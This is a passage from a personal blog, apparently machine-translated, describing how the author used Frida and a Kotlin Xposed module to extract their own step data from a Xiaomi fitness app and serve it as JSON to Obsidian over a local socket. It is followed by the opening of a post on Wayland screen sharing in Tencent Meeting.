// Output: DailyStepReport(time=1706745600, time = 2024-02-01 08:00:00, tag='days', steps=110, distance=66, calories=3, minStartTime=1706809500, maxEndTime=1706809560, avgStep=110, avgDis=66, active=[], stepRecords=[StepRecord{time = 2024-02-02 01:30:00, steps = 110, distance = 66, calories = 3}])
  6. One last snag: steps is a private attribute, and accessors like getSteps() and getSourceData() all failed with "not a function", presumably because of how Kotlin properties are compiled. I resorted to Java reflection to read the field.

The final Frida script below fetches the daily step data; changing the HomeDataType yields other metrics.

```javascript
var CommonSummaryUpdaterCompanion = Java.use("com.xiaomi.fitness.aggregation.health.updater.CommonSummaryUpdater$Companion");
var HomeDataType = Java.use("com.xiaomi.fit.fitness.export.data.annotation.HomeDataType");
var instance = CommonSummaryUpdaterCompanion.$new().getInstance();
console.log("instance: " + instance);

var step = HomeDataType.STEP;
var DailyStepReport = Java.use("com.xiaomi.fit.fitness.export.data.aggregation.DailyStepReport");

// Query one day's worth of step reports (timestamps are in seconds).
var result = instance.getReportList(step.value, 1706745600, 1706832000);
var report = result.get(0);
console.log("report: " + report + report.getClass());

// "steps" is a private Kotlin property, so read it via Java reflection.
var stepsField = DailyStepReport.class.getDeclaredField("steps");
stepsField.setAccessible(true);
var steps = stepsField.get(report);
console.log("Steps: " + steps);
// Output: Steps: 110
```

Final – Xposed Module

The plan now is to serve the data on a local port from inside the app via Xposed; adding some protection against plaintext transmission is put off for now. Since the app is always running, this approach should be feasible. The immediate obstacle was that I had never written Kotlin, let alone an Xposed module.

Fortunately, the Kotlin compiler's suggestions are good enough that, apart from configuring Xposed itself, little extra knowledge was needed. With the help of GPT, I spent an hour or two getting the initial environment set up (gradle is a pain: slow without a proxy, and unresponsive with one). The conversion helper reads every field of the hooked report through XposedHelpers reflection; the snippet below picks up inside that function, where each raw step record is mapped to a serializable object:

```kotlin
        if (record != null) {
            SerializableStepRecord(
                time = XposedHelpers.getLongField(record, "time"),
                steps = XposedHelpers.getIntField(record, "steps"),
                distance = XposedHelpers.getIntField(record, "distance"),
                calories = XposedHelpers.getIntField(record, "calories")
            )
        } else null
    }

    val activeStageList = activeStageListObject.mapNotNull { activeStageItem ->
        if (activeStageItem != null) {
            SerializableActiveStageItem(
                calories = XposedHelpers.getIntField(activeStageItem, "calories"),
                distance = XposedHelpers.getIntField(activeStageItem, "distance"),
                endTime = XposedHelpers.getLongField(activeStageItem, "endTime"),
                riseHeight = XposedHelpers.getObjectField(activeStageItem, "riseHeight") as? Float,
                startTime = XposedHelpers.getLongField(activeStageItem, "startTime"),
                steps = XposedHelpers.getObjectField(activeStageItem, "steps") as? Int,
                type = XposedHelpers.getIntField(activeStageItem, "type")
            )
        } else null
    }

    return SerializableDailyStepReport(
        time = XposedHelpers.getLongField(xposedReport, "time"),
        tag = XposedHelpers.getObjectField(xposedReport, "tag") as String,
        steps = XposedHelpers.getIntField(xposedReport, "steps"),
        distance = XposedHelpers.getIntField(xposedReport, "distance"),
        calories = XposedHelpers.getIntField(xposedReport, "calories"),
        minStartTime = XposedHelpers.getObjectField(xposedReport, "minStartTime") as Long?,
        maxEndTime = XposedHelpers.getObjectField(xposedReport, "maxEndTime") as Long?,
        avgStep = XposedHelpers.callMethod(xposedReport, "getAvgStepsPerDay") as Int,
        avgDis = XposedHelpers.callMethod(xposedReport, "getAvgDistancePerDay") as Int,
        stepRecords = stepRecords,
        activeStageList = activeStageList
    )
}

}
```


The code above is the conversion helper: it reads each field of the hooked report object via XposedHelpers reflection, maps the step records and active-stage items into `SerializableStepRecord` and `SerializableActiveStageItem` objects, and finally assembles a `SerializableDailyStepReport` from the processed data.

```kotlin
// build.gradle.kts [Module]
plugins {
    ...
    kotlin("plugin.serialization") version "1.9.21"
}

dependencies {
    ...
    implementation("org.jetbrains.kotlinx:kotlinx-serialization-json:1.6.2")
}
```

The snippet above enables the Kotlin serialization plugin in build.gradle.kts and adds the kotlinx-serialization-json dependency used for JSON serialization.

```kotlin
return Json.encodeToJsonElement(SerializableDailyStepReport.serializer(), convertToSerializableReport(today))
```

The statement above uses Json.encodeToJsonElement with the generated serializer to turn a SerializableDailyStepReport into a JSON element.
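
The serializable DTOs themselves are not shown here; for the generated serializer above to exist, they are plain data classes annotated with @Serializable. The sketch below is a reconstruction under that assumption, with field names and rough types taken from the conversion code above; the real definitions may differ in types and nullability.

```kotlin
import kotlinx.serialization.Serializable

// Hypothetical reconstruction: field names mirror the conversion helper above.
@Serializable
data class SerializableStepRecord(
    val time: Long,
    val steps: Int,
    val distance: Int,
    val calories: Int
)

@Serializable
data class SerializableActiveStageItem(
    val calories: Int,
    val distance: Int,
    val endTime: Long,
    val riseHeight: Float?,
    val startTime: Long,
    val steps: Int?,
    val type: Int
)

@Serializable
data class SerializableDailyStepReport(
    val time: Long,
    val tag: String,
    val steps: Int,
    val distance: Int,
    val calories: Int,
    val minStartTime: Long?,
    val maxEndTime: Long?,
    val avgStep: Int,
    val avgDis: Int,
    val stepRecords: List<SerializableStepRecord>,
    val activeStageList: List<SerializableActiveStageItem>
)
```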

Broadcasting

This section is about getting the data off the phone. The first idea was a BroadcastReceiver, but it was dropped because relaying broadcasts between the Android device and a computer gets complicated.

That led to an HTTP REST API implemented with Ktor, but the irregular retrieval schedule and the need to keep a server running all the time raised concerns about power consumption.

Subsequently, the notion of using sockets was explored to establish communication. A ServerSocket is created to listen for incoming connections, and a ClientHandler is spawned to handle each client's requests. This approach provides a more direct and energy-efficient means of communication compared to HTTP servers.

```kotlin
import android.util.Log
import de.robv.android.xposed.callbacks.XC_LoadPackage.LoadPackageParam
import java.net.ServerSocket

class MySocketServer(
    private val port: Int,
    private val lpparam: LoadPackageParam,
    private val instance: Any
) {
    fun startServerInBackground() {
        Thread {
            try {
                val serverSocket = ServerSocket(port)
                Log.d("MiBand", "Server started on port: ${serverSocket.localPort}")
                while (!Thread.currentThread().isInterrupted) {
                    val clientSocket = serverSocket.accept()
                    val clientHandler = ClientHandler(clientSocket)
                    Thread(clientHandler).start()
                }
            } catch (e: Exception) {
                Log.e("MiBand", "Server Error: ${e.message}")
            }
        }.start()
    }
}
```

Above is a snippet depicting the creation of a socket server that listens on a specified port, handles incoming client connections, and delegates processing to separate threads for improved concurrency.
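
The module's entry point is not shown in this write-up. As a rough, hedged sketch of how the pieces could be wired together, the handleLoadPackage below waits for the app's Application.onCreate, fetches the CommonSummaryUpdater instance the same way the Frida script did, and hands it to MySocketServer. The Companion/getInstance reflection path and the port number 8888 are assumptions rather than confirmed details of the app, and module registration (assets/xposed_init, manifest metadata) is omitted.

```kotlin
import android.app.Application
import de.robv.android.xposed.IXposedHookLoadPackage
import de.robv.android.xposed.XC_MethodHook
import de.robv.android.xposed.XposedHelpers
import de.robv.android.xposed.callbacks.XC_LoadPackage

class HookEntry : IXposedHookLoadPackage {
    override fun handleLoadPackage(lpparam: XC_LoadPackage.LoadPackageParam) {
        if (lpparam.packageName != "com.mi.health") return

        // Wait until the app has started so its singletons actually exist.
        XposedHelpers.findAndHookMethod(
            Application::class.java, "onCreate",
            object : XC_MethodHook() {
                override fun afterHookedMethod(param: XC_MethodHook.MethodHookParam) {
                    // Assumption: mirror the Frida script and reach the updater
                    // through its Kotlin Companion object.
                    val updaterClass = XposedHelpers.findClass(
                        "com.xiaomi.fitness.aggregation.health.updater.CommonSummaryUpdater",
                        lpparam.classLoader
                    )
                    val companion = XposedHelpers.getStaticObjectField(updaterClass, "Companion")
                    val instance = XposedHelpers.callMethod(companion, "getInstance")

                    // Hand the live instance to the socket server shown above.
                    // Port 8888 is an arbitrary placeholder.
                    MySocketServer(8888, lpparam, instance).startServerInBackground()
                }
            }
        )
    }
}
```

Scoping the module to com.mi.health in the Xposed manager keeps the hook from being loaded into unrelated processes.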

I then realized that Templater inside Obsidian is limited in how it can run external scripts against a raw socket, so the handler ends up speaking just enough HTTP by hand for the data to be fetched with a plain HTTP request from that environment.

```kotlin
override fun run() {
    try {
        // Code for handling HTTP requests and responses
    } catch (e: IOException) {
        e.printStackTrace()
    }
}

private fun parseQueryString(query: String?): Map<String, String> {
    // Parsing the query string from the HTTP request
}

private fun sendSuccessResponse(outputStream: PrintWriter, result: SerializableResponse) {
    // Sending a successful HTTP response with serialized data
}
```

The skeleton above outlines the ClientHandler: it parses the incoming HTTP request, dispatches on the requested path, and writes an appropriate response back to the client.
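
Since only the outline is shown, here is a hedged, minimal sketch of what such a ClientHandler could look like. The /steps path, the fetchReportJson() helper, and the response shape are illustrative assumptions rather than the actual implementation; in the real module, fetchReportJson would call getReportList on the hooked instance and serialize the result as shown earlier.

```kotlin
import java.io.BufferedReader
import java.io.IOException
import java.io.InputStreamReader
import java.io.PrintWriter
import java.net.Socket

class ClientHandler(private val socket: Socket) : Runnable {
    override fun run() {
        try {
            val reader = BufferedReader(InputStreamReader(socket.getInputStream()))
            val writer = PrintWriter(socket.getOutputStream(), true)

            // Request line looks like: "GET /steps?days=1 HTTP/1.1"
            val requestLine = reader.readLine() ?: return
            val target = requestLine.split(" ").getOrNull(1) ?: "/"
            val path = target.substringBefore('?')
            val params = parseQueryString(target.substringAfter('?', ""))

            val body = when (path) {
                // Placeholder path; dispatch on whatever routes the module exposes.
                "/steps" -> fetchReportJson(params)
                else -> """{"error":"unknown path"}"""
            }

            writer.print("HTTP/1.1 200 OK\r\n")
            writer.print("Content-Type: application/json\r\n")
            writer.print("Content-Length: ${body.toByteArray().size}\r\n")
            writer.print("\r\n")
            writer.print(body)
            writer.flush()
        } catch (e: IOException) {
            e.printStackTrace()
        } finally {
            socket.close()
        }
    }

    private fun parseQueryString(query: String): Map<String, String> =
        query.split("&")
            .filter { it.contains("=") }
            .associate { it.substringBefore("=") to it.substringAfter("=") }

    private fun fetchReportJson(params: Map<String, String>): String {
        // Placeholder: the real module would call the hooked app's getReportList
        // and run the result through kotlinx.serialization as shown earlier.
        return """{"steps":0}"""
    }
}
```

With something like this in place, the Templater script on the computer only needs to issue a plain GET to http://&lt;phone-ip&gt;:&lt;port&gt;/steps and parse the JSON body.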

Overall, the combined use of socket communication and manual HTTP handling provides the necessary infrastructure to facilitate data exchange between the Android application and external systems while maintaining a balance between efficiency and functionality.

info

This content is generated by ChatGPT and might be wrong or incomplete; refer to the Chinese version if you find something wrong.

Wayland - Tencent Meeting Screen Sharing Solution

· 4 min read

Wayland - Tencent Meeting Screen Sharing Solution

During a team meeting I tried to share my screen, but only my mouse pointer was visible to the others. In the end I fell back on pointing a phone camera at the screen, which was far from ideal. After some searching I found a relatively elegant (if somewhat convoluted) solution, so I decided to document it briefly.